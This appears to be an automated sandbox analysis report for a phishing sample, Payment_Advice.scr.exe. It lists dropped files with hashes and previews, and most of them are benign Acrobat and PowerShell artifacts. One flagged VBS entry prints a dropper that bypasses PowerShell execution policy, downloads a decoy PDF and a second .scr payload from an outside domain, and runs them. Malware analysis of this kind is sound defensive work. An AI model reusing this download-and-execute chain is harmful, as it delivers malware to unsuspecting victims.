Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.259637775205034
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJfbPtdPeUkwRe9:YvXKXFU+oc+GDV8Ukee9
MD5:	D5745CBACD07AA3A1CAA8BA60071B8FD
SHA1:	BB0C7CFECFC64AE12D98BEB8E9EEC46CBF3166C8
SHA-256:	F9DECA8162107DBAF4D3A3D08AF26B64743D032200050EF3891394999B89B3F4
SHA-512:	D485AF08E8DF34DB8D68807825E308EC1A3D967F940DF62FB5DDFA9C2698B99A545B36D861A8C1F96EDE98F970B817024F754AF5396A05204745B445858DCA50
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.262371483932344
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJf21rPeUkwRe9:YvXKXFU+oc+G+16Ukee9
MD5:	DB8E1EC2CED9A4D807FD5BA0DC11CA7B
SHA1:	F901B8E95535892CA91B2FC78B91E1A983B652D0
SHA-256:	289DF037CAFE5E3AFC2ECFCF69402C62D30242F18C60B485862D1977A0608534
SHA-512:	093D5DE151E187072E0E1BD3C58A271A8A4881C58BEC235A223971DC25FED59934E54B4D3EABC839247E40A3E5E49FFBF38DB68819677F41431E39FBDB1A3414
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.282154320809142
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJfbpatdPeUkwRe9:YvXKXFU+oc+GVat8Ukee9
MD5:	10A96A817F1C4179123E88D85839DE68
SHA1:	24C782BE99F161B5E85BE793D17663C25152EFF7
SHA-256:	A1AD7349E2954CF32D4204596AA783594F26AF6B77053B38371159936CE99C2F
SHA-512:	55AD4D436F7B17ED04E589AE1006D298D4ECEFD6055D8064150B5BEF09596355521901BC6668CECBBDC2CF6547A519C54C931349F4AED2257173AF3AABC29AE0
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.2389001987477375
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFUMn1mnZiQ0Y6doAvJfshHHrPeUkwRe9:YvXKXFU+oc+GUUUkee9
MD5:	693046CA16D8ED34995E49FBE3140B3E
SHA1:	3D0DE110D6F594C489519432131188A5F7585177
SHA-256:	E7A84CA1C2513A7DAF9A61D094FD00977EEC339282FC98EFB21FD64F250B3DC1
SHA-512:	2C6318A3C86E683B61902300CA294410E453C3E85532A25DA36C70902E88D637B5C9FF38ABC936A9AE2B72EF6847A8F815845EEDF80D6B27373303BB4F129C1C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	782
Entropy (8bit):	5.3504402572605425
Encrypted:	false
SSDEEP:	12:YvXKXFU+oc+GTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWE:Yv6XnI168CgEXX5kcIfANhd
MD5:	3540986E0D1613585FB72FF15951F9E2
SHA1:	0378A5460DF64DB2AB162A9954467EC13C63B7AA
SHA-256:	83B5323B6631C97163DD63303F5B688A66A62897C3A35623486F3AB1C31F9261
SHA-512:	311EB01D617B35FEB0FB3E22059975B867BFABE9C7324E5C0E28D9CE74471C3A3E238850CF718A4B5F1470949B646F280603A79309A8E4A3007C43D86CCA579E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"21100c14-c96c-4d74-8f94-af704b60d40c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1714743021100,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1714569441140}}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.1338143375095555
Encrypted:	false
SSDEEP:	24:YbqB1X0/CTqdXTwmxDGuGEahWAnay05BnO4NYjIpj0S0x8zoA2A4i2LSeplv5lSK:Yb68GqdkmxGrWH02sKdLfUbvyn9Nm
MD5:	08BE054E683C7FB9B5331156D1F97BBB
SHA1:	B5A1EBD8C464D2A6FDDE0F00E5281B0F7FA200E7
SHA-256:	24CCD662F6D03C4188BB5A60AF065EE364C4D81015C13B138E09EF369F449C0E
SHA-512:	0C6940612F66B1F606FA1A699C656B10DE3EF000A580939C8F285C3B76B36BEE6D5CAC220C70A200E6C2EDA3980BC9A4A5294FC8E9ECD3BB308B0D1A9BA27EEB
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"fdd4db71b187319b31ed5091eff194a5","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1714569440000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"888cfb5fc136dcf82eebaeef71c98998","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1372,"ts":1714569440000},{"id":"Edit_InApp_Aug2020","info":{"dg":"e4f5bfa0f2abadebf6b593c6f5be4676","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1714569440000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"67dfcc517d13ba7c3b87f7f9f4047fcb","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1714569440000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"d9d5e6360980a36f6e52d1827e567f61","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1714569440000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"cd53f271e151bca4daed58c784c54430","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1714569440000},

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.145187900850734
Encrypted:	false
SSDEEP:	24:TLhx/XYKQvGJF7urs06PRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudJ:TFl2GL7ms0cXc+XcGNFlRYIX2v3kLC
MD5:	4126061BCA8A288E1844545680377F94
SHA1:	C3DE06F34337A6E71CFDD18FDB4852B7C98EF891
SHA-256:	4EC63114732EA14FFED4D35BF7FC8F27B387EEF1E1E677E241E50E56816125BF
SHA-512:	D1FCCE24290EA23A99450002FFACEB05E3A4240137034BB6AB144F893FEFD55BB8AE39A9854EE646022B967C714CDB4714B9805011F7664236EAA2F35FAA6E57
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.550976682469725
Encrypted:	false
SSDEEP:	24:7+tC6PUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxmqLxx/XY7:7MCLXc+XcGNFlRYIX2vTqVl2GL7msi
MD5:	5DDE134CCC50EF00803472B878681AD3
SHA1:	5AF89E06E2CEC0AD05EC3038D3BF9C5F981662C1
SHA-256:	11F8976E5B64072988343B24AB5BCE50329A9F202B101781FA005E61EC35BABB
SHA-512:	C880650B35B25D76E34D5D996E90FC676957D9954D415036B54E3CC5ACA99F891FD0D57DE3BC233DE01F70DFF02620E768227E11FE71E81297220947D5747D37
Malicious:	false
Preview:	.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment_Advice.scr.exe.log

Download File

Process:	C:\Users\user\Desktop\Payment_Advice.scr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	706
Entropy (8bit):	5.349842958726647
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84j
MD5:	9BA266AD16952A9A57C3693E0BCFED48
SHA1:	5DB70A3A7F1DB4E3879265AB336B2FA1AFBCECD5
SHA-256:	A6DFD14E82D7D47195A1EC7F31E64C2820AB8721EF4B5825E21E742093B55C0E
SHA-512:	678E1F639379FC24919B7CF562FA19CE53363CBD4B0EAB66486F6F8D5DD5958DE3AAE8D7842EE868EFCC39D907FDC1A3ACF464E29D37B0DAEE9874C39730FE8E
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hadvices.scr.log

Download File

Process:	C:\Windows\Temp\hadvices.scr
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	706
Entropy (8bit):	5.349842958726647
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84j
MD5:	9BA266AD16952A9A57C3693E0BCFED48
SHA1:	5DB70A3A7F1DB4E3879265AB336B2FA1AFBCECD5
SHA-256:	A6DFD14E82D7D47195A1EC7F31E64C2820AB8721EF4B5825E21E742093B55C0E
SHA-512:	678E1F639379FC24919B7CF562FA19CE53363CBD4B0EAB66486F6F8D5DD5958DE3AAE8D7842EE868EFCC39D907FDC1A3ACF464E29D37B0DAEE9874C39730FE8E
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11608
Entropy (8bit):	4.887486353364779
Encrypted:	false
SSDEEP:	192:Pxoe5lpOdxoe56ib49Vsm5emdzVFn3eGOVpN6K3bkkjo5LgkjDt4iWN3yBGHB9sT:lVib49PVoGIpN6KQkj2kkjh4iUx4cYK6
MD5:	E3CC2E628C73E9D29D58817DFC1ADCC5
SHA1:	3720336F2BCB67ADACD9FED9645AC3FFDC67928D
SHA-256:	6C52B5B7085CA1A5EB18B7C7FF740BEC18D0911CCF7B321B4668EF725A912F3B
SHA-512:	6C5DC96D036DD24BE29720F1568EE70DB069EE5F3F91D59289A9E597C699D4BEBEBA5525B43B3BC7EAE3D467211C6826137FEF1A57E42593DB6E308A2237EE32
Malicious:	false
Preview:	PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulxmH/lZ:NllUg
MD5:	D904BDD752B6F23D81E93ECA3BD8E0F3
SHA1:	026D8B0D0F79861746760B0431AD46BAD2A01676
SHA-256:	B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
SHA-512:	5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
Malicious:	false
Preview:	@...e................................. ..............@..........

C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs

Download File

Process:	C:\Users\user\Desktop\Payment_Advice.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	1634
Entropy (8bit):	3.551963477893781
Encrypted:	false
SSDEEP:	24:T8umgCjOO5OWWeiVhfzBpnUMkWBiGfzzX+mzUMkWD+m862DeynNCjOy3:T8upCjO2We+tfHY8bLHLB2DlnIjd3
MD5:	95DB312E30DD0364924E7B45D1AB6FA8
SHA1:	1FF6577F81C4DF9FC6BF0B91E7421E46A24D43DE
SHA-256:	E469EA6ED5267E8984305A6F6EFCB3D2942199B80E06C340C7199B82CFF230F9
SHA-512:	6236BE94169639CB2B202B7741256CA1A3E39E8DE8AAA14A957F2BD18FE1953DAD3ACA2BB2597505EE2C7120DB6D34FC4C5CBB9756945034CAF00FC7F553AAD5
Malicious:	true
Preview:	S.u.b. .R.u.n.P.o.w.e.r.S.h.e.l.l.C.o.m.m.a.n.d.(.)..... . . . .D.i.m. .o.b.j.S.h.e.l.l.,. .p.s.C.o.m.m.a.n.d......... . . . .'. .C.r.e.a.t.e. .S.h.e.l.l. .o.b.j.e.c.t..... . . . .S.e.t. .o.b.j.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)......... . . . .'. .C.o.m.b.i.n.e.d. .P.o.w.e.r.S.h.e.l.l. .c.o.m.m.a.n.d.s. .t.o. .r.u.n..... . . . .p.s.C.o.m.m.a.n.d. .=. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .B.y.p.a.s.s. .-.C.o.m.m.a.n.d. .".".I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. .'.h.t.t.p.s.:././.a.d.v.i.s.i.n.g.-.r.e.c.e.i.p.t.s...c.o.m./.h.s.b.c./.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'. .-.O.u.t.F.i.l.e. .'.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'.;. .S.t.a.r.t.-.P.r.o.c.e.s.s. .'.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'.;. .I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. .'.h.t.t.p.s.:././.a.d.v.i.s.i.n.g.-.r.e.c.e.i.p.t.s...c.o.m./.h.s.b.c./.h.a.d.v.i.c.e.s...s.c.r.'. .-.

C:\Users\user\AppData\Local\Temp\MSI1a406.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.5081383324894926
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K80QQRI7:Qw946cPbiOxDlbYnuRKzI7
MD5:	3E31CF08ECBD81C36E54C3C5B66D1F72
SHA1:	3B400AA964BD16AFA8517BCC1672FDBC4B32E88A
SHA-256:	7A36DA190B4789CB0C152F178FBDB5468782BC10A868CC44620EE35793E8BA32
SHA-512:	C2C2C4810ED457510B8E3926C6FA83AFD9D22940843013EC22758DF5AD4E57DA67DC027FCB1BA248067BDE202F1361F71E9AC37D6C55AC5609FB6A10A0DBEB5C
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.1./.0.5./.2.0.2.4. . .1.5.:.1.7.:.2.4. .=.=.=.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ceh4mzno.4a1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzrk54o5.dkk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-05-01 15-17-11-905.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.338264912747007
Encrypted:	false
SSDEEP:	384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
MD5:	128A51060103D95314048C2F32A15C66
SHA1:	EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
SHA-256:	601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
SHA-512:	55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
Malicious:	false
Preview:	SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.3646577673224645
Encrypted:	false
SSDEEP:	384:brRG5bF+NU29fQ9VjCrfENFSoHSIDjDzD3D2D5DFDvDqDCDcDzD32bVvMiHhk0bD:Qv/vz6tJ7O2gv+h/XHx9+K3MZM
MD5:	A589B63425C32C4A58E1457F65DEB72E
SHA1:	089E6AFD08A819712B0B66F281C495B022178745
SHA-256:	3F6CFB5B3EA7180CA15AF4EC9D9E9FC8F2C93B4DE402C1484776FA73B51D3044
SHA-512:	FB252B2E510F3CB084D7F083403BBA1D9231A5F30A734D26707205EB2B36F53D1DF964C19ED958FD01D78DCECF0D67A10FEB79358BE295D01E1A169FE7DDE658
Malicious:	false
Preview:	SessionID=99d2e205-ebd4-404e-b92b-9fe688fb4df2.1714569431915 Timestamp=2024-05-01T15:17:11:915+0200 ThreadID=7308 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=99d2e205-ebd4-404e-b92b-9fe688fb4df2.1714569431915 Timestamp=2024-05-01T15:17:11:916+0200 ThreadID=7308 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=99d2e205-ebd4-404e-b92b-9fe688fb4df2.1714569431915 Timestamp=2024-05-01T15:17:11:916+0200 ThreadID=7308 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=99d2e205-ebd4-404e-b92b-9fe688fb4df2.1714569431915 Timestamp=2024-05-01T15:17:11:916+0200 ThreadID=7308 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=99d2e205-ebd4-404e-b92b-9fe688fb4df2.1714569431915 Timestamp=2024-05-01T15:17:11:916+0200 ThreadID=7308 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.398582609323947
Encrypted:	false
SSDEEP:	192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbGcbbIRTcb1:V3fOCIdJDeaRs
MD5:	2A4970FC21728A0D5F649E0C921BD59B
